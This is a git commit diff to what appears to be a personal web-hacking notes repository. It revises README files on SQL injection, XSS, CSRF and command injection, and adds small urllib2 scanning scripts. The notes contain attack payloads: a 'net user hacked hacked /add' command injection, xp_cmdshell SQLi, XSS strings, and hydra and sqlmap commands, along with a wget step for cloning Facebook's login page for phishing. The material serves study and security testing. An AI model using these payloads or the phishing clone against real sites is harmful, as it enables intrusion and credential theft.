WebHacking: README, urllib2 scripts

2025-04-27 02:59:08 -04:00 · 2014-12-29 13:06:07 -05:00 · 2014-12-29 13:06:07 -05:00 · a36bde60b7
commit a36bde60b7
parent 54d8d02892
15 changed files with 209 additions and 99 deletions
--- a/Other_Hackings/README.md
+++ b/Other_Hackings/README.md
@ -17,3 +17,4 @@
 ## Useful lists

 - primes to 100k
+
--- a/Web_Security/OS_Command_Injection/README.md
+++ b/Web_Security/OS_Command_Injection/README.md
@ -10,11 +10,14 @@


 * For example for snippet:
+
 ```
 String cmd = new String("cmd.exe /K processReports.bat clientId=" + input.getValue("ClientId"));
 Process proc = Runtime.getRuntime().exec(cmd);
 ```
+
 For a client id equal **444**, we would have the following string:
+
 ```
 cmd.exe /K processReports.bat clientId=444
 ```
@ -25,7 +28,7 @@ However, an attacker could run use the client id equal **444 && net user hacked
 cmd.exe /K processReports.bat clientId=444 && net user hacked hacked /add
 ```

-## Examples of Injectuon Payloads:
+## Examples of Injection Payloads:

 * Control characters and common attack strings:
 	- '-- SQL injection
@ -39,7 +42,7 @@ cmd.exe /K processReports.bat clientId=444 && net user hacked hacked /add

 ## Fuzz Testing Web Applications

-* Focus on the relevant attack sruface of the web application.
+* Focus on the relevant attack surface of the web application.
 * Typically HTTP request parameters:
 	- QueryString
 	- POST data
@ -49,10 +52,10 @@ cmd.exe /K processReports.bat clientId=444 && net user hacked hacked /add
 * Other entry points with request structures:
 	- XML web services
 	- WCF, GWT, AMF
-	- Remote Method Invoation (RMI)
+	- Remote Method Invocation (RMI)

 * Fixing injection flaws:
-	- Comphehensive, consistent server-side input validation
+	- Comprehensive, consistent server-side input validation
 	- User Safe command APIs
 	- Avoid concatenating strings passed to an interpreter
 	- Use strong data types in favor of strings
@ -77,7 +80,7 @@ cmd.exe /K processReports.bat clientId=444 && net user hacked hacked /add

 #### Evading Blacklist filters

-Exploit payloads: 
+Exploit payloads:

 ```
 ';exec xp_cmdshell 'dir';--
--- a/Web_Security/OS_Command_Injection/sqli_password_brute_force.py
+++ b/Web_Security/OS_Command_Injection/sqli_password_brute_force.py
@ -1,8 +1,6 @@
 #!/usr/bin/python

-__author__ = "bt3gl"
-__email__ = "bt33gl@gmail.com"
-
+__author__ = "bt3"

 import requests
 import string
--- a/Web_Security/PHP_shellcodes/tricking_file_extension_gif.php
+++ b/Web_Security/PHP_shellcodes/tricking_file_extension_gif.php
--- a/Web_Security/Phishing/README.md
+++ b/Web_Security/Phishing/README.md
@ -6,6 +6,14 @@

 ## Tools

+
+
+### Cloning a Login Page
+
+```
+$ wget -U "Mozilla/5.0" -mkL http://facebook.com
+```
+
 ### Free Hostings:

 - http://www.my3gb.com/
--- a/Web_Security/README.md
+++ b/Web_Security/README.md
@ -1,14 +1,53 @@
 # Web Security

-* If a database is involved -->  SQL injection.
+## Folders:

-* If the input is used in the website --> XSS vulnerability.
+### urllib2
+
+- simple GET, POST, header, authentication scripts
+- Scanning CMS suites installations
+- Brute force directories and file locations
+- Brute force HTML form authentication
+
+### OS Command Injection
+
+- Brute force password
+
+### SQLi
+
+- Brute force password
+- Timed SQLi
+- Cookie force brute


+### PHP Shellcodes
+
+- php primer
+- xor
+- exploits
+
+### User ID
+- cookie auth
+- user id
+
+### Phishing
+
+- log.php
+
+
+### Scanners
+
+- heartbleed
+
+
+
+
+
+---

 ## Steps of web exploitation:

-1. Information Gathering
+### 1) Information Gathering

 * creation of dictionary: with **cewl.rb**/

@ -22,9 +61,14 @@ $ wget -rck <TARGET-WEBSITE>

 * a search for other domains that are hosted on the same IP  (virtual host): with **revhosts**.

+* Tips:
+
+	* If a database is involved -->  SQL injection.
+
+	* If the input is used in the website --> XSS vulnerability.


-2. Automatic Testing (scanners)
+### 2) Automatic Testing (scanners)

 * Tools: **Nikto**, **w3af**, **skipfish**, **Arachni**, **ZAP**/

@ -37,11 +81,11 @@ $ wget -rck <TARGET-WEBSITE>
 * fuzzing to the various parameters, directories and others, in order to identify different types of vulnerabilities such as: XSS, SQLi, LDAPi, Xpathi, LFI, or RFI. Tool: **PowerFuzzer**, **Pipper** or ***Burpproxy***. A good fuzzy dictionary is **fuzzdb**.


-3. Manual testing
+### 3. Manual testing

 * testing vulnerabilities: Burpproxy, ZAP, sitescope.

-* identify components and plugins that have enabled the Website, as might be the following types of CMS (Content Managment Systems): Joomla Component, Wordpress plugin, Php-Nuke, drupal, Movable Type, Custom CMS, Blogsmith/Weblogs, Gawker CMS, TypePad, Blogger/Blogspot, Plone, Scoop, ExpressionEngine, LightCMS, GoodBarry, Traffik, Pligg, Concrete5, Typo3, Radiant CMS, Frog CMS, Silverstripe, Cushy CMS etc. Then find known vulnerabilities and **/** associated with it. Tools: **joomla Scan** or **cms-explorer**.
+* identify components and plugins that have enabled the Website, as might be the following types of CMS (Content Management Systems): Joomla Component, Wordpress plugin, Php-Nuke, drupal, Movable Type, Custom CMS, Blogsmith/Weblogs, Gawker CMS, TypePad, Blogger/Blogspot, Plone, Scoop, ExpressionEngine, LightCMS, GoodBarry, Traffik, Pligg, Concrete5, Typo3, Radiant CMS, Frog CMS, Silverstripe, Cushy CMS etc. Then find known vulnerabilities and **/** associated with it. Tools: **joomla Scan** or **cms-explorer**.

 * headers, http methods, sessions, certifications: we could use any tool like a proxy or a simple telnet connection to the Website.
 * fingerprinting to identify the architecture and configuration of the site: **httprint**.
@ -83,15 +127,15 @@ $ hydra -L users.txt -P pass.txt <WEBSTE> http-head/private
 ```


-* [My list of common web vulnerabilities.](http://bt3gl.github.io/a-list-of-common-web-vulnerabilities.html)

 ---
 ## How do You Hack a Web Application

-* Fuzz testing: what happens when unexpected data is sent into the application?
-* Authentication testing: are authentication requirements always enforced?
-* Authorization testing: can authorization be bypassed?
-* Information disclosure: is information disclosed that might help compromise the application.
+* **Fuzz testing**: what happens when unexpected data is sent into the application?
+* **Authentication testing**: are authentication requirements always enforced?
+* **Authorization testing**: can authorization be bypassed?
+* **Information disclosure**: is information disclosed that might help compromise the application.
+

 ### Web Testing Methodology:

@ -103,37 +147,19 @@ $ hydra -L users.txt -P pass.txt <WEBSTE> http-head/private
 	* Unprivileged/Privileged.

 - Identify key requests, functionality during crawl.
+
 - Use logs as input for fuzzing GET & POST parameters.
+
 - Use authenticated log to uncover unprotected resources.
- Use privileged log to uncover resources withou proper authorization.
+
+- Use privileged log to uncover resources without proper authorization.
+
 - Analyze logs for other potential weakness.


-## Folders:
+---

-### OS Command Injection
-
-
-### SQLi
-
- Brute force password
- Timed SQLi
- Cookie force brute
-
-
-### PHP Shells
-
- php primer
- xor
- exploits
-
-### User ID
- cookie auth
- user id
-
-### Other Resources
-
-#### When we have a Website/IP Address:
+### When we have a Website/IP Address:

 - Try to add folders to the domain, such as http://csaw2014.website.com or http://key.website.com.

@ -152,7 +178,7 @@ $ hydra -L users.txt -P pass.txt <WEBSTE> http-head/private

 ## URLs

-#### Octal
+### Octal

 - Example: http://017700000001 --> 127.0.0.1

@ -160,10 +186,10 @@ $ hydra -L users.txt -P pass.txt <WEBSTE> http-head/private

 ((206 * 256 + 191) * 256 + 158 ) * 256 + 50 = 3468664370.

-Now, there is a further step that can make this address even more obscure. You can add to this dword number, any multiple of the quantity 4294967296 (2564) 
+Now, there is a further step that can make this address even more obscure. You can add to this dword number, any multiple of the quantity 4294967296 (2564)


-#### Great @
+### Great @

 - Everything between "http://" and "@" is completely irrelevant

@ -172,7 +198,7 @@ http://doesn'tmatter@www.google.org
 http://!$^&*()_+`-={}|[]:;@www.google.com
 ```

- @ symbol can be represented by its hex code %40 
+- @ symbol can be represented by its hex code %40
 - dots are %2e


@ -199,7 +225,7 @@ http://!$^&*()_+`-={}|[]:;@www.google.com
 	- Accept-Language: supported language codes
 	- Referer: originating page for the request

-* The headers are terminated with a single empty line, which may be followed by any payload the client wishes to pass to the server (the length should be specified with the Content-Length header). 
+* The headers are terminated with a single empty line, which may be followed by any payload the client wishes to pass to the server (the length should be specified with the Content-Length header).

 * The  payload is usually browser data, but there is no requirements.

@ -241,7 +267,7 @@ name=John&type=2

 ### Session IDs

-* HTTP protocol does not maintain state between requests. To maintain a state, must use a state tracking mechanism such as session identifier (session ID), which is passed within a request to associate requests with a session. 
+* HTTP protocol does not maintain state between requests. To maintain a state, must use a state tracking mechanism such as session identifier (session ID), which is passed within a request to associate requests with a session.

 * Session ID's can be passed in these places:
 	- URL
@ -260,11 +286,6 @@ Set-Cookie: SID=472ndsw;expires=DATE;path=/;domain=SITE,HttpOnly
 * Client sends Cookie header to server to continue session.


-----
-## Tools
-
- Burp Suite
- FireBug] in Firefox


 ----
@ -342,10 +363,10 @@ SELECT user_id FROM user_data  WHERE name='john' and password='password'

 * Browser naively submits credentials when attempting to retrieve resources.

-* Identification and verification manual of CSRF can be done by checking in the website's forms (usually where most often find this vulnerability). 
+* Identification and verification manual of CSRF can be done by checking in the website's forms (usually where most often find this vulnerability).

 * To check this, you will need to copy an original request (GET / POST) on a form and then make a change in the parameters and re-send the same request modified. If the server does not return an error, it can be considered that it is vulnerable to
-CSRF. 
+CSRF.

 * To perform this task, we can use the tools **csrftester** or **burp** proxy.

@ -435,11 +456,11 @@ GET /Vuln.jsp?p1=<script>evil();</script>
 * Encode attack strings: URL, UTF-8, UTF-7
 * Trick browser into using alternative character set (necessity of encoding consistence):
 ```
-<?php 
-header('Content-Type: text/html; charset=UTF-7'); 
-$string = "<script>alert('XSS');</script>"; 
-$string = mb_convert_encoding($string, 'UTF-7'); 
-echo htmlentities($string); 
+<?php
+header('Content-Type: text/html; charset=UTF-7');
+$string = "<script>alert('XSS');</script>";
+$string = mb_convert_encoding($string, 'UTF-7');
+echo htmlentities($string);
 ?>
 ```

@ -661,20 +682,12 @@ Authorization: Basic YWRtaW46YWRtaW4=
 </body>
 ```

----




 -----------------
-[FireBug]: http://getfirebug.com/
-[Burp Suite]: http://portswigger.net/burp/
-[pngcheck]: http://www.libpng.org/pub/png/apps/pngcheck.html
-[karmadecay]: http://karmadecay.com/
-[tineye]:  https://www.tineye.com/
-[images.google.com]: https://images.google.com/?gws_rd=ssl
-[base64 decoding]: http://www.motobit.com/util/base64-decoder-encoder.asp
-[subbrute.py]: https://github.com/SparkleHearts/subbrute
-[pnginfo]: http://www.stillhq.com/pngtools/
-[namechk]: http://namechk.com

+## Other Tools
+* [FireBug](http://getfirebug.com/)
+* [Burp Suite](http://portswigger.net/burp/)
--- a/Web_Security/SQLi/README.md
+++ b/Web_Security/SQLi/README.md
@ -5,8 +5,8 @@
 * SQL works by building query statements, these statements are intended to be readbale and intuitive.


-* A SQL query  search can be easily manipulated and assume that a SQL query search is a reliable command. This means  that SQL searches are capable of passing, unnoticed, by access control mechanisms. 
-* Using methods of diverting standard authentication and by checking the authorization credentials, you can gain access to important information stored in a database. 
+* A SQL query  search can be easily manipulated and assume that a SQL query search is a reliable command. This means  that SQL searches are capable of passing, unnoticed, by access control mechanisms.
+* Using methods of diverting standard authentication and by checking the authorization credentials, you can gain access to important information stored in a database.

 * Exploitation:
 	- Dumping contents from the database.
@ -94,12 +94,12 @@ http://www.website.com/info.php?id=10'

 If the website returns the following error:

-	You have an error in your SQL syntax...
+		You have an error in your SQL syntax...

 It means that this website is vulnerable to SQL.

 #### Find the structure of the database
-To find the number of columns and tables in a database we can use [Python's SQLmap](http://sqlmap.org/).  
+To find the number of columns and tables in a database we can use [Python's SQLmap](http://sqlmap.org/).

 This application streamlines the SQL injection process by automating the detection and exploitation of SQL injection flaws of a database. There are several automated mechanisms to find the database name, table names, and number of columns.

@ -140,13 +140,13 @@ $ ./sqlmap.py -u <WEBSITE> --dbs

 ```
 ./sqlmap -u <WEBSITE> --tables <DATABASE-NAME>
-``` 
+```

 * The main objective is to find  usernames and passwords in order to gain access/login to the site, for example in a table named *users*. The sqlmap command is

 ```
 ./sqlmap -u <WEBSITE> --columns -D <DATABASE-NAME> -T <TABLE-NAME>
-``` 
+```

 This will return information about the columns in the given table.

@ -200,11 +200,11 @@ $name = mysql_real_escape_string($name);
 $SQL = "SELECT * FROM users WHERE username='$name'";
 ```

-* Always perform a parse of data that is received from the user (POST and FORM methods). 
+* Always perform a parse of data that is received from the user (POST and FORM methods).
 	- The chars to be checked:```", ', whitespace, ;, =, <, >, !, --, #, //```.
 	- The reserved words: SELECT, INSERT, UPDATE, DELETE, JOIN, WHERE, LEFT, INNER, NOT, IN, LIKE, TRUNCATE, DROP, CREATE, ALTER, DELIMITER.

-* Do not display explicit error messages that show the request or a part of the SQL request. They can helpfingerprint the RDBMS(MSSQL, MySQL).
+* Do not display explicit error messages that show the request or a part of the SQL request. They can help fingerprint the RDBMS(MSSQL, MySQL).

 * Erase user accounts that are not used (and default accounts).

--- a/Web_Security/SQLi/sqli_16_brute_force_password.py
+++ b/Web_Security/SQLi/sqli_16_brute_force_password.py
@ -1,7 +1,6 @@
 #!/usr/bin/python

-__author__ = "bt3gl"
-__email__ = "bt33gl@gmail.com"
+__author__ = "bt3"

 import requests
 import string
--- a/Web_Security/SQLi/sqli_18_timed_SQLi.py
+++ b/Web_Security/SQLi/sqli_18_timed_SQLi.py
@ -1,7 +1,6 @@
 #!/usr/bin/python

-__author__ = "bt3gl"
-__email__ = "bt33gl@gmail.com"
+__author__ = "bt3"

 import requests
 import string
--- a/Web_Security/SQLi/sqli_COOKIE_brute.py
+++ b/Web_Security/SQLi/sqli_COOKIE_brute.py
@ -1,24 +1,22 @@
 #!/usr/bin/python

-__author__ = "bt3gl"
-__email__ = "bt33gl@gmail.com"
+__author__ = "bt3"

 import requests

-
 def brute_force_password(URL, PAYLOAD, MAXID):

    for i in range(MAXID):
        #HEADER ={'Cookie':'PHPSESSID=' + (str(i) + '-admin').encode('hex')}
        r = requests.post(URL, params=PAYLOAD)
-        
+
 	print(i)
 	print r.text
 	id_hex = requests.utils.dict_from_cookiejar(r.cookies)['PHPSESSID']
 	print(id_hex.decode('hex'))


-     
+

 if __name__ == '__main__':

--- a/Web_Security/Scanners/README.md
+++ b/Web_Security/Scanners/README.md
@ -2,7 +2,7 @@

 * Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files/CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software.

-* Most scanned vulnerabilities are things such as XSS, phpmyadmin logins, 
+* Most scanned vulnerabilities are things such as XSS, phpmyadmin logins,
 etc.


@ -23,15 +23,15 @@ $ ./nikto.pl -h <IP> -p <PORT> -output <OUTPUT-FILE>

 ## [W3af](http://w3af.org/)

-* w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to help you secure your web applications by finding and exploiting all web application vulnerabilities.
+* w3af is a Web Application Attack and Audit Framework. The project's goal is to create a framework to help you secure your web applications by finding and exploiting all web application vulnerabilities.

 * It's coded in Python.

-* It has plugins that communicate with each other. 
+* It has plugins that communicate with each other.

 * It removes some of the headaches involved in manual web application testing through its Fuzzy and manual request generator feature.

-* It can be configured to run as a MITM proxy. The requests intercepted can be sent to the request generator and then manual web application testing can be perfomerd using variables parameters.
+* It can be configured to run as a MITM proxy. The requests intercepted can be sent to the request generator and then manual web application testing can be peperformedsing variables parameters.

-* It also has features to exploit the vulnerabilities that it finds. w3af supports detection of both simple and blind  OS commanding vulnerability. 
+* It also has features to exploit the vulnerabilities that it finds. w3af supports detection of both simple and blind  OS commanding vulnerability.

--- a/Web_Security/urllib2/mapping_web_app_install.py
+++ b/Web_Security/urllib2/mapping_web_app_install.py
@ -0,0 +1,68 @@
+#!/usr/bin/env python
+
+__author__ = "bt3"
+
+import urllib2
+import Queue
+import os
+import threading
+
+THREADS = 10
+TARGET = 'http://www.blackhatpython.com'
+# local directory into which we have downloaded and extracted the web app
+#DIRECTORY = '/home/User/Desktop/Joomla'
+#DIRECTORY = '/home/User/Desktop/wordpress'
+DIRECTORY = '/home/User/Desktop/drupal'
+# list of file extensions to not fingerprinting
+FILTERS = ['.jpg', '.gif', '.png', '.css']
+
+# each operation in the loop will keep executing until the web_paths
+# Queue is empty. on each iteration we grab a path from the queue, add it
+# to the target website's base path and then attempt to retrieve it
+def test_remote():
+    while not web_paths.empty():
+        path = web_paths.get()
+        url = '%s%s' % (TARGET, path)
+        request = urllib2.Request(url)
+
+        try:
+            response = urllib2.urlopen(request)
+            content = response.read()
+
+            # if we are successfully retrieving the file, the output HTTP status code
+            # and the full path for the file is printed
+            print '[%d] => %s' % (response.code, path)
+            response.close()
+
+        # if the file is not found or protected by .htaccess, error
+        except urllib2.HTTPError as error:
+            fail_count += 1
+            print "Failed" + str(error.code)
+
+
+if __name__ == '__main__':
+    os.chdir(DIRECTORY)
+    # queue object where we store files to locate in the remote server
+    web_paths = Queue.Queue()
+
+    # os.walk function walks through all the files and directories in the local
+    # web application directory. this builds the full path to the target files
+    # and test them against filter list to make sure we are looking for the
+    # files types we want. For each valid file we find, we add it to our
+    # web_paths Queue.
+    for r, d, f in os.walk('.'):
+        for files in f:
+            remote_path = '%s/%s' %(r, files)
+            if remote_path[0] == '.':
+                remote_path = remote_path[1:]
+            if os.path.splitext(files)[1] not in FILTERS:
+                web_paths.put(remote_path)
+
+
+    # create a number of threads that will be called the test_remote function
+    # it operates in a loop that keep executing untul the web_paths queue is
+    # empty.
+    for i in range(THREADS):
+        print 'Spawning thread: ' + str(i)
+        t = threading.Thread(target=test_remote)
+        t.start()
--- a/Web_Security/urllib2/simple_get.py
+++ b/Web_Security/urllib2/simple_get.py
@ -0,0 +1,25 @@
+#!/usr/bin/env python
+
+__author__ = "bt3"
+
+import urllib2
+
+def get(url):
+    msg = urllib2.urlopen(url)
+    print msg.read()
+
+def get_user_agent(url):
+    headers = {}
+    headers['User-Agent'] = 'Googlebot'
+
+    request = urllib2.Request(url, headers=headers)
+    response = urllib2.urlopen(request)
+
+    print response.read()
+    response.close()
+
+
+
+if __name__ == '__main__':
+    HOST = 'http://www.google.com'
+    get_user_agent(HOST)
--- a/Web_Security/user_id/sqli_19_cookie_auth.py
+++ b/Web_Security/user_id/sqli_19_cookie_auth.py
@ -1,7 +1,6 @@
 #!/usr/bin/python

-__author__ = "bt3gl"
-__email__ = "bt33gl@gmail.com"
+__author__ = "bt3"

 import requests

--- a/Web_Security/user_id/sqli_20_user_id_2.py
+++ b/Web_Security/user_id/sqli_20_user_id_2.py
@ -1,7 +1,6 @@
 #!/usr/bin/python

-__author__ = "bt3gl"
-__email__ = "bt33gl@gmail.com"
+__author__ = "bt3"

 import requests